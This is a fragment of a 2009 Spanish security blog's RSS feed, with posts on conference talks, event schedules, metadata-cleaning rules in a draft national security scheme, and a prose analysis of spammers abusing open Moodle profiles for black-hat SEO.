href="http://www.google-logos.com/"&gt;blog dedicado a los logos oficiales y no oficiales de Google&lt;/a&gt; con más de una obra de arte sobre esta pasión de diseñar logos de una compañía de Software. Esto si que es saber ser googly. Mola &lt;a href="http://www.google-logos.com/top-official-google-logos"&gt;la votación de los logos oficiales&lt;/a&gt; y que esté en tercer lugar uno dedicado a nuestro Joan Mirò.&lt;br /&gt;&lt;br /&gt;Saludos Malignos!&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;a href="http://elladodelmal.blogspot.com" target="new"&gt;http://elladodelmal.blogspot.com&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/21555208-7226661381415087289?l=elladodelmal.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ElLadoDelMal/~4/GYdPxkJvdCc" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ElLadoDelMal/~3/GYdPxkJvdCc/mi-lado-googly.html</link><author>noreply@blogger.com (Maligno)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SvRJJNuK_mI/AAAAAAAAFfE/SCV5QaleM0I/s72-c/summer2004_closing.gif" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total><feedburner:origLink>http://elladodelmal.blogspot.com/2009/11/mi-lado-googly.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-21555208.post-1175742032341091467</guid><pubDate>Thu, 05 Nov 2009 23:01:00 +0000</pubDate><atom:updated>2009-11-05T23:36:04.964+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Eventos</category><category domain="http://www.blogger.com/atom/ns#">MetaShield Protector</category><category domain="http://www.blogger.com/atom/ns#">CSPP</category><category domain="http://www.blogger.com/atom/ns#">Exchange Server</category><category domain="http://www.blogger.com/atom/ns#">Metadatos</category><category domain="http://www.blogger.com/atom/ns#">Forefront</category><category domain="http://www.blogger.com/atom/ns#">Firefox</category><title>Décimo Aniversario Informática64</title><description>&lt;div align="justify"&gt;El pasado 1 de Octubre celebramos el décimo aniversario de Informática64. El evento tuvo muchas más cosas a parte de la sesión plenaria, pero al menos os dejamos aquí las charlas de la misma.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;Juan Luis G. Rambla: MS Forefront Threat Management Gateway&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;div style="width:425px;text-align:left" id="__ss_2433258"&gt;&lt;a style="font:14px Helvetica,Arial,Sans-serif;display:block;margin:12px 0 3px 0;text-decoration:underline;" href="http://www.slideshare.net/chemai64/forefront-threat-management-gateway" title="Forefront Threat Management Gateway"&gt;Forefront Threat Management Gateway&lt;/a&gt;&lt;object style="margin:0px" width="425" height="355"&gt;&lt;param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=00ppts1eventotmgjuanluis-091105163006-phpapp02&amp;stripped_title=forefront-threat-management-gateway" /&gt;&lt;param name="allowFullScreen" value="true"/&gt;&lt;param name="allowScriptAccess" value="always"/&gt;&lt;embed src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=00ppts1eventotmgjuanluis-091105163006-phpapp02&amp;stripped_title=forefront-threat-management-gateway" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div style="font-size:11px;font-family:tahoma,arial;height:26px;padding-top:2px;"&gt;View more &lt;a style="text-decoration:underline;" href="http://www.slideshare.net/"&gt;presentations&lt;/a&gt; from &lt;a style="text-decoration:underline;" href="http://www.slideshare.net/chemai64"&gt;chemai64&lt;/a&gt;.&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;object width="400" height="300"&gt;&lt;param name="allowfullscreen" value="true" /&gt;&lt;param name="allowscriptaccess" value="always" /&gt;&lt;param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=7450310&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1" /&gt;&lt;embed src="http://vimeo.com/moogaloop.swf?clip_id=7450310&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="400" height="300"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/Center&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;Alejandro Martín Bailón: MetaShield Protector&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;div style="width:425px;text-align:left" id="__ss_2433219"&gt;&lt;a style="font:14px Helvetica,Arial,Sans-serif;display:block;margin:12px 0 3px 0;text-decoration:underline;" href="http://www.slideshare.net/chemai64/metashield-protector" title="MetaShield Protector"&gt;MetaShield Protector&lt;/a&gt;&lt;object style="margin:0px" width="425" height="355"&gt;&lt;param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=presentacionalex-091105161813-phpapp02&amp;stripped_title=metashield-protector" /&gt;&lt;param name="allowFullScreen" value="true"/&gt;&lt;param name="allowScriptAccess" value="always"/&gt;&lt;embed src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=presentacionalex-091105161813-phpapp02&amp;stripped_title=metashield-protector" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div style="font-size:11px;font-family:tahoma,arial;height:26px;padding-top:2px;"&gt;View more &lt;a style="text-decoration:underline;" href="http://www.slideshare.net/"&gt;presentations&lt;/a&gt; from &lt;a style="text-decoration:underline;" href="http://www.slideshare.net/chemai64"&gt;chemai64&lt;/a&gt;.&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;object width="400" height="300"&gt;&lt;param name="allowfullscreen" value="true" /&gt;&lt;param name="allowscriptaccess" value="always" /&gt;&lt;param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=7411516&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1" /&gt;&lt;embed src="http://vimeo.com/moogaloop.swf?clip_id=7411516&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="400" height="300"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/center&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;Joshua Sáenz: MS Exchange Server 2010, Message Stats &amp; Apolo&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;div style="width:425px;text-align:left" id="__ss_2433217"&gt;&lt;a style="font:14px Helvetica,Arial,Sans-serif;display:block;margin:12px 0 3px 0;text-decoration:underline;" href="http://www.slideshare.net/chemai64/exchange-server-2010-message-stats" title="Exchange Server 2010 &amp;amp; Message Stats"&gt;Exchange Server 2010 &amp;amp; Message Stats&lt;/a&gt;&lt;object style="margin:0px" width="425" height="355"&gt;&lt;param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=exchange2010messagestats-091105161748-phpapp02&amp;stripped_title=exchange-server-2010-message-stats" /&gt;&lt;param name="allowFullScreen" value="true"/&gt;&lt;param name="allowScriptAccess" value="always"/&gt;&lt;embed src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=exchange2010messagestats-091105161748-phpapp02&amp;stripped_title=exchange-server-2010-message-stats" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div style="font-size:11px;font-family:tahoma,arial;height:26px;padding-top:2px;"&gt;View more &lt;a style="text-decoration:underline;" href="http://www.slideshare.net/"&gt;presentations&lt;/a&gt; from &lt;a style="text-decoration:underline;" href="http://www.slideshare.net/chemai64"&gt;chemai64&lt;/a&gt;.&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;object width="400" height="300"&gt;&lt;param name="allowfullscreen" value="true" /&gt;&lt;param name="allowscriptaccess" value="always" /&gt;&lt;param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=7410418&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1" /&gt;&lt;embed src="http://vimeo.com/moogaloop.swf?clip_id=7410418&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="400" height="300"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/center&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;Chema Alonso: Connection String Attacks&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;div style="width:425px;text-align:left" id="__ss_2014692"&gt;&lt;a style="font:14px Helvetica,Arial,Sans-serif;display:block;margin:12px 0 3px 0;text-decoration:underline;" href="http://www.slideshare.net/chemai64/connection-string-parameter-pollution" title="Connection String Parameter Pollution"&gt;Connection String Parameter Pollution&lt;/a&gt;&lt;object style="margin:0px" width="425" height="355"&gt;&lt;param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=cspp-090917181402-phpapp02&amp;stripped_title=connection-string-parameter-pollution" /&gt;&lt;param name="allowFullScreen" value="true"/&gt;&lt;param name="allowScriptAccess" value="always"/&gt;&lt;embed src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=cspp-090917181402-phpapp02&amp;stripped_title=connection-string-parameter-pollution" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div style="font-size:11px;font-family:tahoma,arial;height:26px;padding-top:2px;"&gt;View more &lt;a style="text-decoration:underline;" href="http://www.slideshare.net/"&gt;presentations&lt;/a&gt; from &lt;a style="text-decoration:underline;" href="http://www.slideshare.net/chemai64"&gt;chemai64&lt;/a&gt;.&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;object width="400" height="300"&gt;&lt;param name="allowfullscreen" value="true" /&gt;&lt;param name="allowscriptaccess" value="always" /&gt;&lt;param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=7393754&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1" /&gt;&lt;embed src="http://vimeo.com/moogaloop.swf?clip_id=7393754&amp;amp;server=vimeo.com&amp;amp;show_title=1&amp;amp;show_byline=1&amp;amp;show_portrait=0&amp;amp;color=&amp;amp;fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="400" height="300"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/Center&gt;&lt;br /&gt;Saludos Malignos!&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;a href="http://elladodelmal.blogspot.com" target="new"&gt;http://elladodelmal.blogspot.com&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/21555208-1175742032341091467?l=elladodelmal.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ElLadoDelMal/~4/s7Frv8u6Gjk" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ElLadoDelMal/~3/s7Frv8u6Gjk/decimo-aniversario-informatica64.html</link><author>noreply@blogger.com (Maligno)</author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">6</thr:total><feedburner:origLink>http://elladodelmal.blogspot.com/2009/11/decimo-aniversario-informatica64.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-21555208.post-6526344949025999584</guid><pubDate>Thu, 05 Nov 2009 13:39:00 +0000</pubDate><atom:updated>2009-11-05T15:05:51.727+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Eventos</category><title>Eventos, Hols y Webcasts semana del 9</title><description>&lt;div align="justify"&gt;La próxima semana, como tenemos un lunes festivo, el número de actividades es menor. El Innovation Tour irá sólo a Zaragoza, la campaña de los &lt;a href="http://www.informatica64.com/MainHols.aspx"&gt;Hands On Lab&lt;/a&gt; será sólo en Madrid y se realizarán solo un par de Webcasts el jueves. Como curiosidad, esta semana, el Viernes 13 comenzará &lt;a href="http://www.informatica64.com/ftsai.aspx"&gt;el Módulo 2 del FTSAI V&lt;/a&gt; y este miércoles en se realizarán las últimas pruebas para los dos próximos &lt;strong&gt;&lt;em&gt;cursos de Antihacking &lt;/em&gt;&lt;/strong&gt;que darán comienzo, de forma gratuita para desempleados y profesionales en situación de mejora de empleo, a partir del 16 de Noviembre.&lt;br /&gt;&lt;br /&gt;Las pruebas tendrán lugar a las 10:00 de la mañana o a las 16:00 de la tarde en el &lt;em&gt;“Centro de Formación en Tecnologías de la Información y las Comunicaciones - Madrid Sur” del Servicio Regional de Empleo de la Comunidad de Madrid"&lt;/em&gt; que está sito en la Avenida Arcas del Agua s/n, CP: 28905, Getafe (Madrid), metro Conservatorio.&lt;br /&gt;&lt;br /&gt;Esta es la distribución por días:&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;martes, 10 de noviembre de 2009 &lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;[Madrid] &lt;a href="http://www.informatica64.com/MainHols.aspx"&gt;HOL-SPS04 MS Windows Sharepoint Services V3&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;miércoles, 11 de noviembre de 2009 &lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;[Madrid] &lt;a href="http://www.informatica64.com/MainHols.aspx"&gt;HOL-SPS09 MS Sharepoint Server 2007. Arquitectura de Portales&lt;/a&gt;  &lt;br /&gt;[Madrid] &lt;a href="http://www.informatica64.com/MainHols.aspx"&gt;HOL-SMS11 System Center Configuration Manager 2007 (SMSv4)&lt;/a&gt;&lt;br /&gt;[Getafe] &lt;strong&gt;&lt;em&gt;Prueba Acceso AntiHacking&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;jueves, 12 de noviembre de 2009 &lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;[Madrid] &lt;a href="http://www.informatica64.com/MainHols.aspx"&gt;HOL-SPS10 MS Sharepoint Server 2007. Entornos Colaborativos&lt;/a&gt;  &lt;br /&gt;[Zaragoza] &lt;a href="http://elladodelmal.blogspot.com/2009/08/innovation-tour-2009.html"&gt;Innovation Tour&lt;/a&gt;&lt;br /&gt;[Webcast] &lt;a href="http://www.microsoft.com/spain/eventos/eventdetail.aspx?EventID=1032431064"&gt;Alta disponibilidad en Exchange Server 2010&lt;/a&gt;&lt;br /&gt;[Webcast] &lt;a href="http://www.microsoft.com/spain/eventos/eventdetail.aspx?EventID=1032430911"&gt;Novedades de C# 2008 &lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;viernes, 13 de noviembre de 2009 &lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;[Madrid] &lt;a href="http://www.informatica64.com/MainHols.aspx"&gt;HOL-SPS07 MS Sharepoint Server 2007. Business Intelligence&lt;/a&gt;  &lt;br /&gt;[Madrid] &lt;a href="http://www.informatica64.com/ftsai.aspx"&gt;FTSAI V: Auditoría de Servidores y Clientes&lt;/a&gt;&lt;br /&gt;[Webcast] &lt;a href="http://www.microsoft.com/spain/eventos/eventdetail.aspx?EventID=1032430104"&gt;Optimización de Microsoft SQL Server&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Saludos Malignos!&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;a href="http://elladodelmal.blogspot.com" target="new"&gt;http://elladodelmal.blogspot.com&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/21555208-6526344949025999584?l=elladodelmal.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ElLadoDelMal/~4/vrqaSee_kDg" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ElLadoDelMal/~3/vrqaSee_kDg/eventos-hols-y-webcasts-semana-del-9.html</link><author>noreply@blogger.com (Maligno)</author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">3</thr:total><feedburner:origLink>http://elladodelmal.blogspot.com/2009/11/eventos-hols-y-webcasts-semana-del-9.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-21555208.post-8820912327856928976</guid><pubDate>Wed, 04 Nov 2009 23:01:00 +0000</pubDate><atom:updated>2009-11-04T22:17:08.013+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">PDF</category><category domain="http://www.blogger.com/atom/ns#">MetaShield Protector</category><category domain="http://www.blogger.com/atom/ns#">OOXML</category><category domain="http://www.blogger.com/atom/ns#">OpenOffice</category><category domain="http://www.blogger.com/atom/ns#">e-goverment</category><category domain="http://www.blogger.com/atom/ns#">Metadatos</category><category domain="http://www.blogger.com/atom/ns#">ODF</category><category domain="http://www.blogger.com/atom/ns#">Seguridad Informática</category><category domain="http://www.blogger.com/atom/ns#">Office</category><title>Esquema Nacional de Seguridad: Metadatos</title><description>&lt;div align="justify"&gt;&lt;em&gt;"La finalidad del Esquema Nacional de Seguridad es la creación de las condiciones necesarias de confianza en el uso de los medios electrónicos, a través de medidas para garantizar la seguridad de los sistemas, los datos, las comunicaciones, y los servicios electrónicos, que permita a los ciudadanos y a las Administraciones Públicas, el ejercicio de derechos y el cumplimiento de deberes a través de estos medios."&lt;/em&gt;&lt;br /&gt;&lt;br /&gt;Así reza un párrafo en la primera hoja del borrador que se ha hecho público del &lt;a href="http://www.csae.map.es/csi/pdf/20090715_Proyecto_RD_ENS_cn.pdf"&gt;primer borrador del Esquema de Seguridad Nacional&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Como se puede ver a lo largo de las 60 páginas que conforman el documento, está compuesto de un conjunto de normas y recomendaciones creadas para garantizar la seguridad de los usuarios en el ejercicio de su derecho a interactuar con la administración pública mediante el uso de mecanismos informáticos. &lt;br /&gt;&lt;br /&gt;Actualmente es un borrador, pero a nosotros nos ha llamado la atención exactamente este párrafo en concreto del artículado:&lt;br /&gt;&lt;br /&gt;"&lt;em&gt;&lt;strong&gt;5.7.6 Limpieza de documentos&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;En el proceso de limpieza de documentos, se retirará de estos toda la información adicional contenida en campos ocultos, meta-datos, comentarios o revisiones anteriores, salvo cuando dicha información sea pertinente para el receptor del documento.&lt;br /&gt;&lt;br /&gt;Esta medida es especialmente relevante cuando el documento se difunde ampliamente, como ocurre cuando se ofrece al público en un servidor web u otro tipo de repositorio de información.&lt;br /&gt;&lt;br /&gt;El incumplimiento de esta medida puede perjudicar:&lt;br /&gt;&lt;br /&gt;a) Al mantenimiento de la confidencialidad de información que no debería haberse revelado al receptor del documento.&lt;br /&gt;&lt;br /&gt;b) Al mantenimiento de la confidencialidad de las fuentes u orígenes de la información, que no debe conocer el receptor del documento.&lt;br /&gt;&lt;br /&gt;c) A la buena imagen de la organización que difunde el documento por cuanto demuestra un descuido en su buen hacer.&lt;/em&gt;"&lt;br /&gt;&lt;br /&gt;Como se puede ver, hace referencia al tema de meta-dados, información oculta y los datos perdidos, algo con lo que llevamos siendo pesados hace más de un año y que llevó a la creación de la &lt;a href="http://www.informatica64.com/foca"&gt;FOCA&lt;/a&gt;, &lt;a href="http://elladodelmal.blogspot.com/2008/10/oometaextractor.html"&gt;OOMetaextractor &lt;/a&gt;y, por supuesto, &lt;a href="http://www.metashiedlprotector.com/"&gt;MetaShield Protector&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Al leer este párrafo, parece que hablan exactamente de esta herramienta, de &lt;a href="http://www.metashiedlprotector.com/"&gt;MetaShield Protector&lt;/a&gt;, una herramienta que limpia, automáticamente, todos los metadatos e información oculta en documentos Microsoft Office, OpenOffice y PDF de los archivos publicados en la web antes de que estos sean entregados al usuario. ¿A que parece que lo he escrito yo?&lt;br /&gt;&lt;br /&gt;Los más veteranos estaréis ya un poco cansados de este tema, pero para los más nuevos, os dejo las referencias a todos los artículos que hablan de este tema:&lt;br /&gt;&lt;br /&gt;- &lt;a href="http://elladodelmal.blogspot.com/2008/11/metadatos-e-informacin-oculta-en.html"&gt;Metadatos, Información Oculta y datos Perdidos en OpenOffice&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://elladodelmal.blogspot.com/2008/09/metadatos-en-microsoft-office-i-de-v.html"&gt;Metadatos, Información Oculta y datos Perdidos en Microsoft Office&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://elladodelmal.blogspot.com/2009/05/metashield-protector-i-de-iv.html"&gt;MetaShield Protector&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://elladodelmal.blogspot.com/2009/04/foca-manual-de-usuario-i-de-iv.html"&gt;FOCA Manual de Usuario&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Saludos Malignos!&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;a href="http://elladodelmal.blogspot.com" target="new"&gt;http://elladodelmal.blogspot.com&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/21555208-8820912327856928976?l=elladodelmal.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ElLadoDelMal/~4/fNHN3fTZWxU" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ElLadoDelMal/~3/fNHN3fTZWxU/esquema-de-seguridad-nacional-metadatos.html</link><author>noreply@blogger.com (Maligno)</author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">4</thr:total><feedburner:origLink>http://elladodelmal.blogspot.com/2009/11/esquema-de-seguridad-nacional-metadatos.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-21555208.post-6092233037653373609</guid><pubDate>Wed, 04 Nov 2009 08:12:00 +0000</pubDate><atom:updated>2009-11-09T22:14:14.767+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Moodle</category><category domain="http://www.blogger.com/atom/ns#">SEO</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Google</category><category domain="http://www.blogger.com/atom/ns#">Internet</category><title>Técnicas SEO para gente de moral relajada [III de VI]</title><description>&lt;div align="justify"&gt;**********************************************************************************************&lt;br /&gt;- &lt;a href="http://elladodelmal.blogspot.com/2009/10/seo-para-gente-de-moral-relajada-i-de.html"&gt;Técnicas SEO para gente de moral relajada [I de VI]&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://elladodelmal.blogspot.com/2009/10/tecnicas-seo-para-gente-de-moral.html"&gt;Técnicas SEO para gente de moral relajada [II de VI]&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://elladodelmal.blogspot.com/2009/11/tecnicas-seo-para-gente-de-moral.html"&gt;Técnicas SEO para gente de moral relajada [III de VI]&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://elladodelmal.blogspot.com/2009/11/tecnicas-seo-para-gente-de-moral_09.html"&gt;Técnicas SEO para gente de moral relajada [IV de VI]&lt;/a&gt;&lt;br /&gt;- Técnicas SEO para gente de moral relajada [V de VI]&lt;br /&gt;- Técnicas SEO para gente de moral relajada [VI de VI]&lt;br /&gt;&lt;em&gt;Autores: Chema Alonso &amp; Enrique Rando&lt;/em&gt;&lt;br /&gt;**********************************************************************************************&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;Infraestructura de links: La telaraña&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Una página enlaza obtendrá mayor relevancia cuanto mayor sea la relevancia que realiza el enlace. Es por eso que en muchos mensajes de spam y en muchas de las inserciones masivas de enlaces no se apunte directamente a la página que se desea subir la relevancia, sino a otras que apuntan a ella. Esto ayuda a evitar ser detectados, o al menos lo pone más difícil, ante los buscadores.&lt;br /&gt;&lt;br /&gt;Supongamos que A es la página web que se desea subir en relevancia, para ello se añaden links desde B. A la hora de subir la relevancia los ataques a paginas C se harán o bien apuntando directamente a A o bien apuntando directamente a B. Esto, si B es una página legítima vulnerada, confundirá más si cabe a los buscadores, y mostrará a la página A apuntada desde múltiples dominios lo que la hará parecer más relevante.&lt;br /&gt;&lt;br /&gt;Debido a esto, los hilos de salida de estas telarañas no siempre son los sitios web a promocionar. En su lugar, pueden encontrarse páginas cuyos contenidos son controlados por estos &lt;em&gt;“posicionadores”&lt;/em&gt; y que suelen operar a modo de escaparate.&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SvE5w5QKy6I/AAAAAAAAFck/cuHG_5Rqkdc/s1600-h/Figura10.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 276px;" src="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SvE5w5QKy6I/AAAAAAAAFck/cuHG_5Rqkdc/s400/Figura10.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5400160940359076770" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Figura 10: Spam con links iniciales de telarañas de links&lt;/em&gt;&lt;/center&gt;&lt;br /&gt;Muchas veces esas webs de inicio son perfiles de usuario en plataformas web de cualquier tipo que permitan registrarse libremente ya sea por configuración normal o por un error administrativo. En el ejemplo de la Figura 10 se puede ver como se enlazan perfiles de usuario de plataformas Moodle. Como era de esperar, lógicamente, ese perfil en Moodle no es más que un anuncio publicitario en toda regla.&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_Y2uWeGSk9Sw/SvE5wj-emeI/AAAAAAAAFcc/dYh1iQveSRE/s1600-h/Figura11.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 276px;" src="http://4.bp.blogspot.com/_Y2uWeGSk9Sw/SvE5wj-emeI/AAAAAAAAFcc/dYh1iQveSRE/s400/Figura11.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5400160934647732706" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Figura 11: Perfil de Moodle usado para anunciar Viagra&lt;/em&gt;&lt;/center&gt;&lt;br /&gt;&lt;strong&gt;&lt;em&gt;Anuncios: Una imagen vale más que mil palabras&lt;/em&gt;&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Moodle es una plataforma de software libre para la teleformación usada en numerosos proyectos educativos. A pesar de todas las ventajas que puedan ofrecer, en muchas ocasiones el punto débil de estos sistemas es la forma en que son administrados. No es raro que sea el propio personal docente, que ya tiene otras ocupaciones, quien gestione tanto la instalación y actualización de los sistemas como los contenidos y las cuentas de usuario. &lt;br /&gt;&lt;br /&gt;Como resultado, es habitual que sea posible registrar cuentas de usuario sin pasar por el control de un supervisor. Por otro lado, Moodle permite a cada usuario crear su propia página web con su perfil y le proporciona muchas facilidades a la hora de incorporar contenidos HTML a dicha página. Tantas oportunidades  no podían pasar desapercibidas y como se puede apreciar en la Figura 12 siguiente &lt;u&gt;hay más de 535.000 usuarios de Moodle que han decidido utilizar su perfil para anunciar Viagra&lt;/u&gt;.&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SvE5wc6EacI/AAAAAAAAFcU/VAnLgtV3W5w/s1600-h/Figura12.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 162px;" src="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SvE5wc6EacI/AAAAAAAAFcU/VAnLgtV3W5w/s400/Figura12.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5400160932750191042" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Figura 12: Cuentas de usuario de sistemas Moodle convertidas en escaparates&lt;/em&gt;&lt;/center&gt;&lt;br /&gt;Algunos, incluso, aprovechan estas características para personalizar su perfil de forma que no se note que pertenecen a sistemas Moodle, como en el caso de la Figura 13, con una imagen lo suficientemente bien diseñada para simular una web.&lt;br /&gt;&lt;center&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SvE5wBQpnrI/AAAAAAAAFcM/-tuAQ9rtJME/s1600-h/Figura13.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 286px;" src="http://1.bp.blogspot.com/_Y2uWeGSk9Sw/SvE5wBQpnrI/AAAAAAAAFcM/-tuAQ9rtJME/s400/Figura13.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5400160925328711346" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;em&gt;Figura 13: Parece una página propia pero no lo es&lt;/em&gt;&lt;/center&gt;&lt;br /&gt;Lo que parece una página web no es más que una imagen que ocupa toda la ventana del navegador. Ocultos tras esta imagen, se han introducido enlaces y textos con el objeto de atraer la atención de los buscadores hacia sí y hacia otras páginas.&lt;br /&gt;&lt;br 